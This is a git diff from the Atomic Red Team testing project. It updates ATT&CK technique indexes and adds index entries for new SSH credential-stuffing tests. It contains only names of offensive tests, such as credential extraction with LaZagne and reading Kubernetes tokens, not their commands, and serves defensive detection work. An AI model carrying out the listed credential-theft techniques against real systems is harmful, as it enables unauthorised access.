hniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabl
ed":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techn
iqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":tru
e},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID"
:"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":tr
ue},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"
techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled
":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","scor
e":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"
techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index e9d78206..d701f7c6 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -5,6 +5,8 @@ credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
+credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
+credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
 credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index c9e1bb22..cd372f79 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
+credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 721cf97b..e9e50ace 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -1,5 +1,6 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh +credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index bd9b1af6..586ecb2f 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -15,7 +15,9 @@ - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux] - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] -- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md) + - Atomic Test #1: SSH Credential Stuffing From Linux [linux] + - Atomic Test #2: SSH Credential Stuffing From MacOS [macos] - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos] - Atomic Test #2: Extract passwords with grep [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 678b261a..7df32bb9 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md 
@@ -11,7 +11,8 @@ - [T1552.007 Container API](../../T1552.007/T1552.007.md) - Atomic Test #1: ListSecrets [macos, linux] - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux] -- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md) + - Atomic Test #1: SSH Credential Stuffing From Linux [linux] - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - Atomic Test #2: Extract passwords with grep [macos, linux] - Atomic Test #5: Find and Access Github Credentials [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 215f549a..65e062d0 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -4,7 +4,8 @@ - [T1552.003 Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md) + - Atomic Test #2: SSH Credential Stuffing From MacOS [macos] - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos] - Atomic Test #2: Extract passwords with grep [macos, linux] diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 33891a6e..a6c4f9c7 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md 
@@ -7,7 +7,7 @@ | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Boot or Logon Autostart Execution 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System 
